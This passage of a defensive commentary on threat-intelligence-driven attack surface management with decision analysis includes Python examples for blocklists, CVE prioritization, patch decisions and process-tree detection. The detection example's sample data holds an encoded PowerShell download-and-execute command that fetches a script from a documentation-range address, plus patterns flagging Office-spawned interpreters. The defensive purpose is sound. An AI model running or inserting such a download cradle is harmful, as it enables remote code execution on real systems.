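def blocklist_from_bundle(bundle_json: str, own_networks: Iterable[str] = ()) -> tuple[list[dict], list[str]]:
    """Return (entries, rejected): entries are safe to push to the firewall, rejected says why the rest were not."""
    bundle = json.loads(bundle_json)
    protected = NEVER_BLOCK + [ipaddress.ip_network(n) for n in own_networks]
    coa_for = mitigations(bundle)
    block: dict[str, dict] = {}
    rejected: list[str] = []
    for obj in bundle["objects"]:
        if obj.get("type") != "indicator" or obj.get("revoked", False):
            continue  # revoked indicators must leave the list, not stay on the firewall
        if obj.get("pattern_type", "stix") != "stix":
            rejected.append(f"{obj['id']}: pattern_type {obj['pattern_type']} not parsed")
            continue
        for value in ipv4_terms(obj["pattern"]):
            try:
                ip = ipaddress.ip_address(value)
            except ValueError:
                rejected.append(f"{obj['id']}: malformed address {value!r}")
                continue
            if any(ip in net for net in protected):
                rejected.append(f"{obj['id']}: refusing to block {value} (private or own range)")
                continue
            block.setdefault(value, {"ip": value, "indicator": obj["id"], "actions": coa_for.get(obj["id"], [])})
    entries = sorted(block.values(), key=lambda e: ipaddress.ip_address(e["ip"]))
    return entries, rejected


if __name__ == "__main__":
    entries, rejected = blocklist_from_bundle(SAMPLE_BUNDLE, own_networks=["198.51.100.248/29"])
    for e in entries:
        print(f"deny from {e['ip']}  # {e['indicator']} {e['actions']}")
    for r in rejected:
        print("REVIEW:", r)
```

The `rejected` list is meant to be reviewed by an analyst, not silently dropped: a peer repeatedly sharing an address inside your own range is itself a signal, either of a misconfigured feed or of an attempt to weaponize the sharing program.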
In addition, understanding the impact of CVEs (Common Vulnerabilities and Exposures) through the lens of ATT&CK adversary behaviors within CTI-ASM may help supply the necessary context (CTID, 2021c). Specifically, knowing how adversaries use specific vulnerabilities to achieve their goals helps prioritize those vulnerabilities according to the actual risk in the defender's environment (CTID, 2021c). The increased situational awareness from CTI-ASM helps minimize the enterprise AS (Mavroeidis et al., 2021, p. 328). By swiftly connecting observed behaviors and characteristics to threat actors, CTI-ASM may supply indispensable insights that enable organizations to counter attacks, because how an attack progresses depends on the adversary's goals and TTPs (Microsoft, 2021a). For instance, if an election office shares a malicious IP (Internet Protocol) address through an indicator sharing program, other election offices can add it to a firewall block list and prevent the same attack within seconds (CIS, 2021b).

By deploying CTI-ASM, defenders may apply attack surface reduction (ASR) rules on endpoints, monitored through a SIEM (Security Information and Event Management) or XDR, to help prioritize vulnerabilities and misconfigurations and to block entry vectors and lateral movement more effectively (Microsoft, 2022i; Microsoft, 2022d). For instance, CTI-ASM may apply ASR rules to harden systems exposed to the critical remote code execution vulnerabilities discovered in specific versions of Apache's Log4j software library (Log4Shell), which adversaries used to take control of many affected systems (CISA, n.d.). ASR rules constrain post-exploitation behavior; they do not remove the vulnerability, so they complement rather than replace patching. In addition, CTI-ASM may inform defenders of incidents that need more scoping
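The prioritization argument above (adversary use of a vulnerability, in ATT&CK terms, matters more than its CVSS score alone) is easy to state and easy to get wrong in a ticket queue, so here is an added worked example in Python. It is not from the paper or from the Center for Threat-Informed Defense; the scoring weights, the actor profiles and the CVE-EXAMPLE-* identifiers are constructed placeholders. CVE-2021-44228 (Log4Shell) is real and its mapping to T1190 (Exploit Public-Facing Application) and T1059 (Command and Scripting Interpreter) is public knowledge; the mappings for the placeholders are illustrative. The example combines severity (CVSS), intent and capability (active actors whose observed TTPs overlap the techniques the exploit provides) and opportunity (exposure), and shows a lower-CVSS bug outranking a higher-CVSS one.

```python
"""Prioritize vulnerabilities by adversary behavior (ATT&CK) and exposure, not CVSS alone.
Constructed example: weights, actors and CVE-EXAMPLE-* identifiers are placeholders."""
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Vuln:
    cve: str
    cvss: float            # CVSS v3.1 base score, 0-10 (severity)
    techniques: frozenset  # ATT&CK techniques the exploit hands the adversary (CTID-style CVE->ATT&CK mapping)
    internet_facing: int   # affected instances reachable from the internet (opportunity)
    internal: int          # affected instances reachable only from inside


@dataclass(frozen=True)
class Actor:
    name: str
    techniques: frozenset  # TTPs observed in current campaigns against our sector (capability and intent)


def priority_score(v: Vuln, actors: Iterable[Actor]) -> tuple[float, list[str]]:
    """Score = severity x (1 + number of active actors whose TTPs overlap) x exposure factor.
    Returns the score and a human-readable rationale for the ticket."""
    using = [a.name for a in actors if a.techniques & v.techniques]
    if v.internet_facing + v.internal == 0:
        exposure = 0.0   # not present in our environment: no risk to us, whatever the CVSS says
    elif v.internet_facing:
        exposure = 1.0   # reachable by anyone on the internet
    else:
        exposure = 0.3   # assumed discount for internal-only reachability (placeholder weight)
    score = round((v.cvss / 10.0) * (1 + len(using)) * exposure, 3)
    rationale = [
        f"CVSS {v.cvss}",
        f"exposure: {'internet-facing' if v.internet_facing else 'internal only'} "
        f"({v.internet_facing + v.internal} instances)",
        "used by active actors: " + (", ".join(using) if using else "none observed"),
    ]
    return score, rationale


def prioritize(vulns: Iterable[Vuln], actors: Iterable[Actor]) -> list[tuple[str, float, list[str]]]:
    """Rank vulnerabilities highest risk first as (cve, score, rationale)."""
    actors = list(actors)
    ranked = [(v.cve, *priority_score(v, actors)) for v in vulns]
    return sorted(ranked, key=lambda r: r[1], reverse=True)


# Constructed inventory and actor profiles.
SAMPLE_VULNS = [
    Vuln("CVE-2021-44228", 10.0, frozenset({"T1190", "T1059"}), internet_facing=2, internal=40),   # Log4Shell
    Vuln("CVE-EXAMPLE-A", 9.8, frozenset({"T1068"}), internet_facing=0, internal=300),              # local priv esc
    Vuln("CVE-EXAMPLE-B", 7.5, frozenset({"T1190", "T1059"}), internet_facing=4, internal=0),       # RCE on an edge app
    Vuln("CVE-EXAMPLE-C", 8.8, frozenset({"T1203"}), internet_facing=0, internal=0),                # not deployed here
]
SAMPLE_ACTORS = [
    Actor("RaaS affiliate (constructed)", frozenset({"T1190", "T1059", "T1486"})),
    Actor("Sector-targeting intrusion set (constructed)", frozenset({"T1566", "T1059", "T1021"})),
]

if __name__ == "__main__":
    for cve, score, why in prioritize(SAMPLE_VULNS, SAMPLE_ACTORS):
        print(f"{cve:16} {score:6.3f}  " + "; ".join(why))
```

With these inputs CVE-EXAMPLE-B (CVSS 7.5, internet-facing, exploited through techniques two active actors use) ranks above CVE-EXAMPLE-A (CVSS 9.8, internal only, no observed adversary use), which is the re-ordering the CTID mapping is meant to produce. The weights are the place to plug in the organization's own risk attitude; the structure (severity, intent and capability, opportunity) is what carries over.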
(Microsoft, 2022d). CTI-ASM may curate threat indicator feeds using a CTI platform that loads into a SIEM or XDR-SOAR (Microsoft, 2021d) to provide context for understanding how to improve resiliency using artifacts and other telemetry data.

There are tools to enrich and help visualize CTI-ASM data, such as the msticpy set of Python tools (MSTIC, 2021). Much of the msticpy package is agnostic to the data source. Microsoft designed msticpy for use in Jupyter notebooks. Jupyter is an interactive development and data manipulation environment hosted in a browser that executes the code a user types into a cell and returns its output (Microsoft, 2019). Msticpy includes data providers with pre-built queries for easy access to security data stores, CTI and geo-location lookups to supply context, and analysis functions such as clustering, time series analysis, anomaly identification, base64 decoding, and IOC pattern extraction. With msticpy, CTI-ASM analysts can pivot to derive additional indicators for additional context and use the TI lookup class (TILookup) to search for one or more indicators of compromise (IOCs) across one or more CTI providers. Msticpy also includes mechanisms to visualize event timelines, process trees, maps, charts, and time series (Microsoft, 2019).

6. Applicability of decision analysis

Analysts may apply several DA concepts to improve the quality of CTI and CTI-ASM.

DA tools may help ensure that CTI-ASM incorporates an appropriate risk attitude (cf. Howard & Abbas, 2016, ch. 11). They also help ensure that CTI-ASM priorities reflect a unified corporate risk tolerance and not the risk tolerance of only specific individuals within an organization (Howard & Abbas, 2016, pp. 781-85). The risk tolerance of specific individuals differs depending on where the individual sits.
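As an added example of the endpoint analysis that the KQL queries for unusual processes and the msticpy process-tree, base64-decoding and IOC-extraction functions described above support, the following Python (my code, not msticpy's, standard library only) rebuilds a process tree from constructed telemetry rows shaped like Defender DeviceProcessEvents, flags an Office application spawning a script interpreter, and decodes the interpreter's encoded command to recover the IOCs. The rows, the device name and the 203.0.113.45 address are constructed. The caveat it handles: PowerShell's -EncodedCommand argument is base64 of UTF-16LE text, so decoding it as UTF-8 leaves a NUL after every character and hides the URL from a naive regex.

```python
"""Rebuild a process tree from endpoint telemetry and decode encoded PowerShell to recover IOCs.
Constructed example, standard library only; not msticpy code."""
import base64
import re
from collections import defaultdict

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts -e, -ec, -enc or -encodedcommand (case-insensitive) followed by base64.
# The payload is UTF-16LE, not UTF-8: decode it wrongly and every other byte is a NUL.
ENC_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _enc(script: str) -> str:
    """Encode a script the way an attacker would for -EncodedCommand (used only to build sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed rows shaped like Defender DeviceProcessEvents (or Sysmon event 1) output.
SAMPLE_EVENTS = [
    {"device": "ws-042", "pid": 100, "ppid": 0, "name": "explorer.exe", "cmdline": "C:\\Windows\\explorer.exe"},
    {"device": "ws-042", "pid": 200, "ppid": 100, "name": "WINWORD.EXE",
     "cmdline": '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\a\\Downloads\\invoice.docm"'},
    {"device": "ws-042", "pid": 300, "ppid": 200, "name": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a.ps1')")},
    {"device": "ws-042", "pid": 400, "ppid": 100, "name": "cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"device": "ws-042", "pid": 500, "ppid": 0, "name": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]


def build_tree(events):
    """Index events by pid and collect the children of each parent pid."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def ancestry(by_pid, pid):
    """Process names from the oldest ancestor present in the telemetry down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # `seen` guards against pid reuse creating a cycle
        seen.add(pid)
        chain.append(by_pid[pid]["name"].lower())
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def decode_encoded_powershell(cmdline):
    """Plaintext of an -EncodedCommand argument, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def extract_iocs(text):
    """URLs and IPv4 addresses in text, deduplicated and sorted."""
    return {"urls": sorted(set(URL_RE.findall(text))), "ipv4": sorted(set(IPV4_RE.findall(text)))}


def find_suspicious(events):
    """Flag interpreters spawned by Office and any PowerShell with an encoded command; attach chain and IOCs."""
    by_pid, _ = build_tree(events)
    findings = []
    for e in events:
        name = e["name"].lower()
        parent = by_pid.get(e["ppid"])
        office_child = parent is not None and parent["name"].lower() in OFFICE and name in INTERPRETERS
        decoded = decode_encoded_powershell(e["cmdline"]) if name in ("powershell.exe", "pwsh.exe") else None
        if not office_child and decoded is None:
            continue
        reasons = [r for r, hit in (("office-spawned interpreter", office_child),
                                    ("encoded powershell", decoded is not None)) if hit]
        findings.append({"device": e["device"], "pid": e["pid"], "chain": ancestry(by_pid, e["pid"]),
                         "reasons": reasons, "decoded": decoded, "iocs": extract_iocs(decoded or e["cmdline"])})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(" > ".join(f["chain"]), f["reasons"], f["iocs"])
```

The IOCs recovered from the decoded command are exactly what an analyst would then pivot on through a TI lookup, and the parent chain is what distinguishes a document macro launching PowerShell from an administrator doing the same from a console.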
(Howard & Abbas, 2016, pp. 781-85). While there may be a significant initial struggle to gather the relevant risk information and organizational data, this material can be resourcefully reused and only refreshed intermittently (Spring, 2022).

DA relevance diagrams may help analysts understand the current state of information and assert irrelevance relations to avoid errors in assessments (cf. Howard & Abbas, 2016, ch. 7). Also, while information gathering is necessary for CTI, DA can place a suitable value even on imperfect information, to avoid wasteful gathering of information that is not relevant and material and to ensure that the information's value exceeds its cost (Howard & Abbas, 2016, ch. 13). Distinctions made in CTI should help reach decision clarity; many observable differences are not particularly useful because they supply no benefit (Howard & Abbas, 2016, pp. 84-85). Possibility trees representing multiple distinctions, from a single degree to compound possibilities, may help drive clarity (Howard & Abbas, 2016, p. 87). CTI deals with measures of belief, or probabilities, that depend on the state of information. Therefore, probability trees may help graphically support a division of certainty across many distinctions, each having multiple degrees. The assessment may sometimes change on learning that certain degrees of other distinctions have occurred (Howard & Abbas, 2016, ch. 6). Sensitivity analysis may help decide whether more investigation is necessary and may clarify how the assessment would change if certain elements of the decision basis changed (Howard & Abbas, 2016, ch. 12). CTI often relies on multiple sources of information, requiring an assessment of the relevance relations between them, because the value of joint information can be higher than, less than, or equal to the sum of the values of the individual sources (Howard & Abbas, 2016, p. 397). DA relevance diagrams and probability trees may help in this regard as well.
(Howard & Abbas, 2016, ch. 18).

The methodology of generating CTI assessments, much like DA, requires careful attention to cognition, the process that turns perceptions into beliefs (cf. Howard & Abbas, 2016, p. 351). Cognitive psychology identifies several biases that cause beliefs to reflect perceptions improperly. One is wishful thinking: forming beliefs based on what should be rather than on evidence, and letting a particular worldview affect the thinking process (Howard & Abbas, 2016, p. 351). Another is misuse of the availability heuristic, the tendency to judge an event more likely the more easily it comes to mind, such as letting recent information blow events out of proportion (Howard & Abbas, 2016, p. 351). Another thinking error is estimating probabilities from often incorrect similarity judgments that misinterpret the effect of uncertainty, rather than first separating prior information from new evidence and then processing the data using probability theory (Howard & Abbas, 2016, p. 352). Another cognitive bias relevant to CTI is forming beliefs prematurely, letting first ideas play too large a role in the final assessment (cf. Howard & Abbas, 2016, p. 353). Like DA, CTI must consider the tendency to implicitly condition probabilities on the occurrence of uncertain events (cf. Howard & Abbas, 2016, p. 354). Also like DA, CTI must safeguard against the hidden effects of subconscious motivation, such as when self-interest influences beliefs (cf. Howard & Abbas, 2016, p. 355). Motivational biases can also occur within CTI teams, as differing incentive structures tend to influence assessments unless thought processes are scrutinized for bias (cf. Howard & Abbas, 2016, p. 785).
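To make the decision analysis concepts of this section concrete, the following Python is an added worked example (constructed numbers; it is not from the paper or from Howard & Abbas). A CTI team must decide whether to patch a vulnerability out of band now or wait for the scheduled window. The code computes the break-even probability (the sensitivity analysis), the value of perfect information from a clairvoyant source, a Bayesian update that keeps the prior separate from the new evidence (the remedy for the similarity-judgment error just described), and the value of an imperfect CTI source evaluated on a probability tree. The costs, the prior and the source's hit and false-alarm rates are assumptions, and the arithmetic assumes a risk-neutral decision maker.

```python
"""Decision analysis for a CTI-driven patch-now-or-wait decision.  Constructed numbers."""
from dataclasses import dataclass


@dataclass(frozen=True)
class PatchDecision:
    patch_now_cost: float   # disruption cost of an out-of-band emergency patch (assumed)
    breach_loss: float      # loss if the vulnerability is exploited before the scheduled window (assumed)
    p_exploit: float        # analyst's prior probability of exploitation before that window (assumed)

    def expected_cost(self, p: float) -> dict:
        """Expected cost of each alternative given probability p of exploitation (risk-neutral)."""
        return {"patch_now": self.patch_now_cost, "wait": p * self.breach_loss}

    def best(self, p: float) -> tuple:
        """The cheaper alternative and its expected cost."""
        costs = self.expected_cost(p)
        choice = min(costs, key=costs.get)
        return choice, costs[choice]

    def break_even(self) -> float:
        """Sensitivity analysis: the probability at which the decision flips from wait to patch now."""
        return self.patch_now_cost / self.breach_loss

    def decisions_over(self, probabilities) -> list:
        """Sweep the uncertain input to see where the recommendation is stable and where it is fragile."""
        return [(p, self.best(p)[0]) for p in probabilities]

    def value_of_perfect_information(self) -> float:
        """Upper bound on what any CTI source is worth: a clairvoyant says whether exploitation is coming,
        so we pay the patch cost only in that branch and nothing in the other."""
        without = self.best(self.p_exploit)[1]
        with_info = self.p_exploit * self.patch_now_cost + (1 - self.p_exploit) * 0.0
        return without - with_info

    def posterior(self, report: bool, hit_rate: float, false_alarm_rate: float) -> float:
        """Bayes' rule with the prior kept separate from the evidence.  report=True means the source
        says exploitation is coming; hit_rate = P(report | exploit), false_alarm_rate = P(report | no exploit)."""
        p = self.p_exploit
        if report:
            like_e, like_not_e = hit_rate, false_alarm_rate
        else:
            like_e, like_not_e = 1 - hit_rate, 1 - false_alarm_rate
        return p * like_e / (p * like_e + (1 - p) * like_not_e)

    def value_of_imperfect_information(self, hit_rate: float, false_alarm_rate: float) -> float:
        """Probability tree: branch on what the source will say, update, take the best decision on each
        branch, weight by the branch probability.  A source that reports at the same rate whether or not
        exploitation is coming (hit_rate == false_alarm_rate) is worth exactly nothing."""
        p = self.p_exploit
        p_report = p * hit_rate + (1 - p) * false_alarm_rate
        with_info = sum(p_branch * self.best(self.posterior(report, hit_rate, false_alarm_rate))[1]
                        for report, p_branch in ((True, p_report), (False, 1 - p_report)))
        return self.best(p)[1] - with_info


if __name__ == "__main__":
    d = PatchDecision(patch_now_cost=50.0, breach_loss=1000.0, p_exploit=0.10)
    print("best now:", d.best(d.p_exploit), "break-even p:", d.break_even())
    print("decision by p:", d.decisions_over([0.01, 0.03, 0.10, 0.30]))
    print("value of perfect information:", d.value_of_perfect_information())
    print("value of a source with 80% hit rate, 20% false alarms:", d.value_of_imperfect_information(0.8, 0.2))
```

With a patch cost of 50, a breach loss of 1000 and a prior of 0.10, patching now is best (expected cost 50 against 100 for waiting) and the decision flips at p = 0.05; a clairvoyant is worth 45, and a source that is right 80% of the time with a 20% false-alarm rate is worth 17, so a subscription costing more than that buys nothing for this decision. A risk-averse organization would replace the expected-cost comparison with a utility function, which is where the corporate risk attitude discussed above enters the calculation.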
"While there is no definitive index, over 200 cognitive biases have been identified in psychology, sociology, and management research" (Mohanani et al., 2020, sec. 1). Analysts must be aware of cognitive biases because they can affect the quality of CTI and CTI-ASM.

7. Conclusion

This commentary offers a conceptual framework of CTI-ASM to improve cyber resiliency. In addition, this commentary will hopefully encourage researchers to explore CTI-ASM further, thus serving as a basis for future research. Empirical research is needed to study CTI-ASM in its real-world contexts by collaborating with defenders applying CTI-ASM in day-to-day work. Future research may include a systematic literature review (Siddaway et al., 2019) of DA case studies that apply relevance diagrams, examine corporate risk attitudes, weigh imperfect information, use possibility and probability trees or sensitivity analysis, or address cognitive and motivational biases. Based on the review, research may experiment to test the hypothesis that bridging the gap between DA and CTI-ASM would improve the quality of CTI-ASM and CTI.

Acknowledgements

Thanks to all my Microsoft colleagues for valuable feedback and to Mark Seiden and Jonathan Spring, who helped me improve this commentary's quality. Views expressed do not necessarily reflect the opinions of Microsoft or any contributor.

References

Ahmed, D. (2022, July 21). Critical vulnerability in popular GPS tracker lets hackers remotely control vehicles. HACKREAD. https://www.hackread.com/vulnerability-gps-tracker-hackers-remotely-control-vehicles/

Badhwar, R. (2021). Dynamic measurement of cyber risk. In The CISO's next frontier. doi.org/10.1007/978-3-030-75354-2_40

Barrett, M. (2018). Framework for improving critical infrastructure cybersecurity, version 1.1. NIST Cybersecurity Framework. doi.org/10.6028/NIST.CSWP.04162018

Beek, C. (2020). VirusTotal poisoning. perma.cc/NT4Q-UHQD

Bong, C. W., Holtby, D. W., & Ng, K. S. (2012). Fuzzy multicriteria decision analysis for measurement of document content reliability. 2012 Fifth International Symposium on Computational Intelligence and Design. doi.org/10.1109/iscid.2012.227

Brown, R., & Lee, R. M. (2019). The evolution of cyber threat intelligence (CTI): 2019 SANS CTI survey. SANS Institute. perma.cc/BA3A-ZVSS

Center for Internet Security Intel & Analysis Working Group [Security Intel]. (n.d.). What is cyber threat intelligence? [Blog post]. perma.cc/SP7X-GSBW

Center for Internet Security [CIS]. (2021, January 12) [2021a]. Automated cyber threat intelligence pilot reduced states' response times to minutes [Blog post]. perma.cc/7JQ3-NVBE

Central Intelligence Agency [CIA]. (n.d.). United States. The World Factbook. cia.gov/the-world-factbook/countries/united-states/#people-and-society (last updated 15 June 2022)

CIS. (2021, June 15) [2021c]. Cybersecurity spotlight: Cyber threat indicator sharing [Blog post]. perma.cc/9T34-DVFK

CIS. (2021, June 25) [2021b]. A new vision for cyber threat intelligence at the MS-ISAC [Blog post]. perma.cc/C3HN-S7CS

CIS. (2021, November 19) [2021d]. Real-time indicator feeds [Blog post]. perma.cc/Q2RD-NG7I

The Center for Threat-Informed Defense [CTID]. (2021, May 3) [2021a]. ATT&CK for containers. perma.cc/RKM7-UUCZ

CTID. (2021, October 14) [2021b]. ATT&CK Workbench. perma.cc/ZN7H-3BQ8

CTID. (2021, October 28) [2021c]. Mapping ATT&CK to CVE for impact. perma.cc/JEN4V-XU9A

CTID. (2022, March 2). Attack Flow. perma.cc/VF3Y-EB4H

Cybersecurity and Infrastructure Security Agency [CISA]. (n.d.). Apache Log4j vulnerability guidance. perma.cc/3637-MSGB

Collier, Z. A., DiMase, D., Walters, S., Tehranipoor, M. M., Lambert, J. H., & Linkov, I. (2014). Cybersecurity standards: Managing risk and creating resilience. Computer, 47(9), 70-76. doi.org/10.1109/mc.2013.448

Committee of Sponsoring Organizations of the Treadway Commission [COSO]. (2017). Enterprise risk management: Integrating with strategy and performance. perma.cc/F4TV-P7BX

Davis Advisors, D. S. (2009). On success. Marceline, MO: Walsworth Publishing Company.

Dehghantanha, A., Conti, M., & Dargahi, T. (2019). Cyber threat intelligence. Springer.

Diogenes, Y., & Shinder, T. (2018). Microsoft Azure Security Center. Microsoft Press.

Diamond, T., Kerman, A., Souppaya, M., Stine, K., Johnson, B., Peloquin, C., Ruffin, V., Simon, M., Sweeney, S., & Scarfone, K. (2022). Improving enterprise patching for general IT systems: Utilizing existing tools and performing processes in better ways. NIST Special Publication 1800-31. doi.org/10.6028/NIST.SP.1800-31

Doerr, E. (2021, July 12). Microsoft to acquire RiskIQ to strengthen cybersecurity of digital transformation and hybrid work [Blog post]. perma.cc/Q4LN-ZA3Z

Doherty, D., & McKenney, B. (2021). Zero trust architectures: Are we there yet? (21-1273). MITRE. perma.cc/FB27-7996

Dwivedi, A. (2018). Implementing cyber resilient designs through graph analytics assisted model-based systems engineering. 2018 IEEE International Conference on Software Quality, Reliability and Security Companion (QRS-C). doi.org/10.1109/qrs-c.2018.0010

Elitzur, A., Puzis, R., & Zilberman, P. (2019). Attack hypothesis generation. 2019 European Intelligence and Security Informatics Conference (EISIC). doi:10.1109/EISIC49498.2019.9108886

Estrin, E. (2022). Cloud security handbook. Packt Publishing.

Gartner Enterprise Risk Management Research Team [Gartner]. (2021, March 29) [2021a]. 2021 ERM risk response accelerator for cyber risks — topic guide: ERM's role and frameworks (ID No. G00743265). [GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.] perma.cc/SHJV-ZZ3M

Gartner. (2021, March 29) [2021b]. 2021 ERM risk response accelerator for cyber risks — topic guide: Controls, threats, and consequences (ID No. G00748842). perma.cc/Y85L-LRB4

Ginty, S. (2022, April 20). Discover the anatomy of an external cyberattack surface with new RiskIQ report. perma.cc/UH2P-9T4X

Godyla, N., & Nickels, K. (2021, June 22). Strategies, tools, and frameworks for building an effective threat intelligence team [Blog post]. perma.cc/MHSQ-MC6V

Gourisetti, S. N., Mylrea, M., & Patangia, H. (2020). Cybersecurity vulnerability mitigation framework through empirical paradigm (CyFEr): Prioritized gap analysis. IEEE Systems Journal, 14(2), 1897-1908. doi.org/10.1109/jsyst.2019.2913141

Gylling, A., Ekstedt, M., Afzal, Z., & Eliasson, P. (2021). Mapping cyber threat intelligence to probabilistic attack graphs. 2021 IEEE International Conference on Cyber Security and Resilience (CSR). doi:10.1109/csr51186.2021.9527970

Hallum, C. (2021, December 6). Protect printers, cameras, and the rest of your IoT devices starting today! [Microsoft blog post]. perma.cc/QZ4E-T7LY

Hamilton, E. (2021, July 20). What are cyber-physical attacks? The Science Times.

Harvard Business Review [HBR]. (2021, July 19). Pulse survey: Cybersecurity in the era of intelligence and an expanding attack surface. HBR Analytic Services.

Harvard Law School Forum on Corporate Governance [Harvard]. (2022, April 11). Proposed SEC cyber rules: A game changer for public companies. perma.cc/BXF6-6V7G

Heuer, R. J. (2019). Psychology of intelligence analysis. Pickle Partners Publishing.

Hong, Z., Li, S., & Yu, L. (2020). Accelerating update of approximations under a dominance relation. IEEE Access, 8, 146472-146482. doi.org/10.1109/access.2020.3015813

Howard, R. A., & Abbas, A. E. (2016). Foundations of decision analysis (global ed.). Harlow, England: Pearson Education Limited.

Howard, R. A., & Matheson, J. E. (1989). Readings on the principles and applications of decision analysis (Vol. I). SDG Decision Systems.

Hutchins, E. M., Cloppert, M. J., & Amin, R. M. (2011). Intelligence-driven computer network defense informed by analysis of adversary campaigns and intrusion kill chains. Leading Issues in Information Warfare & Security Research, 1, 80. perma.cc/DN4K-XQLE

IDC. (2022, April 27) [2022a]. Global cybersecurity market implications of the Russia-Ukraine war webinar. perma.cc/U7AB-YLFK

IDC. (2022, May 12) [2022b]. Worldwide digital transformation investments forecast to reach $1.8 trillion in 2022, according to new IDC spending guide. perma.cc/UCQ3-KRAL

International Organization for Standardization [ISO]. (2020). Security and resilience: Business continuity management systems. Guidance on the use of ISO 22301 (ISO 22313:2020(E)). perma.cc/CT7K-BKN6

Jakkal, V. (2022, May 9). Building a safer world together with our partners: Introducing Microsoft Security Experts. perma.cc/3AYC-BZVT

Joint Task Force. (2018). Risk management framework for information systems and organizations. NIST Special Publication 800-37, Rev. 2. doi.org/10.6028/NIST.SP.800-37r2

Kazmi, S. A., & Naarananoja, M. (2014). Significance of management system for effective organizational management. GSTF International Journal on Business Review (GBR), 3(2). doi.org/! 1540706

Kriaa, S., & Chaabane, Y. (2021). SecKG: Leveraging attack detection and prediction using knowledge graphs. 2021 12th International Conference on Information and Communication Systems (ICICS). doi:10.1109/ICICS52457.2021.9464587

Kumar, S. (2022, March 3). Cybercrime: A clear and present danger. Security Magazine. perma.cc/6T7S-UCSS

Lee, R. M., & Brown, R. (2021). 2021 SANS cyber threat intelligence (CTI) survey. perma.cc/SU9Z-BR44

Li, M., Jia, W., & Zhao, W. (2001). Decision analysis of network-based intrusion detection systems for denial-of-service attacks. 2001 International Conferences on Info-Tech and Info-Net, Proceedings (Cat. No. 01EX479), 5, 1-6. doi.org/10.1109/ICII.2001.983485

Lin, H., Burnett, D., Sheaffer, D. A., & Arnold, E. (2009). Applying decision analysis process to exterior physical security system technology design and selection. 43rd Annual 2009 International Carnahan Conference on Security Technology, 312-316. doi:10.1109/CCST.2009.5335519

Mavroeidis, V., Hohimer, R., Casey, T., & Jøsang, A. (2021). Threat actor type inference and characterization within cyber threat intelligence. 2021 13th International Conference on Cyber Conflict (CyCon). doi:10.23919/CyCon51939.2021.9468305

McAfee Enterprise [McAfee], & FireEye. (2021, November 9). Cyber threats have increased 81% since global pandemic. perma.cc/7L8W-KXX7

McMillan, R., Poulsen, K., & Volz, D. (2022, March 28). Secret world of pro-Russia hacking group exposed in leak. Wall Street Journal [WSJ]. perma.cc/S7WP-PIOT

Microsoft Corp. [Microsoft]. (2019). Why use Jupyter for security investigations? msticpy 1.7.5 documentation. perma.cc/Q467-DDTS

Microsoft. (2020, September 22). Microsoft delivers unified SIEM and XDR to modernize security operations. Microsoft Security Blog. perma.cc/V6A5S-IDKG

Microsoft. (2021, April 1) [2021a]. Automating threat actor tracking: Understanding attacker behavior for intelligence and contextual alerting. Microsoft Security Blog. perma.cc/3W4Z-6M3R

Microsoft. (2021, August 13) [2021b]. Attackers use Morse code, other encryption methods in evasive phishing campaign. Microsoft Security Blog. perma.cc/A6EB-TH2S

Microsoft. (2021, October) [2021c]. Microsoft Digital Defense Report. Microsoft Security. perma.cc/AY24-ZQ73

Microsoft. (2021, November 18) [2021d]. Connect your threat intelligence platform to Microsoft Sentinel. perma.cc/$MM7-DUSR

Microsoft. (2021, November 19) [2021e]. External attack surface management: Intelligent defense in the age of digital transformation. perma.cc/UA9H-4VYA

Microsoft. (2021, December 11) [2021f]. Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability. perma.cc/IY7A-SWYQ

Microsoft. (2022, January 11) [2022a]. Inside Microsoft 365 Defender: Mapping attack chains from cloud to endpoint. Microsoft Security Blog. perma.cc/SSB5-UXXD

Microsoft. (2022, March 7) [2022c]. Kusto Query Language (KQL) overview. Azure Data Explorer | Microsoft Docs. perma.cc/3VVG-ZEN6

Microsoft. (2022, April 19) [2022b]. The mobile attack surface goes beyond major mobile app stores. Security Insider. perma.cc/PH89-ZND8

Microsoft. (2022, April 19) [2022g]. Anatomy of an external attack surface: Threat actors don't have to compromise assets to attack an organization or its customers. perma.cc/GSES-MZGR

Microsoft. (2022, May 9) [2022d]. Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself. Microsoft Security Blog. perma.cc/EBW7-U9SK

Microsoft. (2022, May 11) [2022h]. Failure modes in machine learning. Security documentation | Microsoft Docs. perma.cc/AX6S-ASHZ

Microsoft. (2022, May 17) [2022i]. Understand and use attack surface reduction (ASR). Microsoft Docs. perma.cc/D9DH-T55Z

Microsoft. (2022, June 14) [2022e]. Threat intelligence integration in Microsoft Sentinel. Microsoft Docs. perma.cc/2S6G-L7LS

Microsoft Threat Intelligence Center [MSTIC]. (2021, April 27). MSTICPy v1.0.0 and Jupyter notebooks in Azure Sentinel, an update. perma.cc/9ANN-QL3T

The MITRE Corp. [MITRE]. (2021, June 22). CVE-2021-35244. perma.cc/LGF4-2CKH

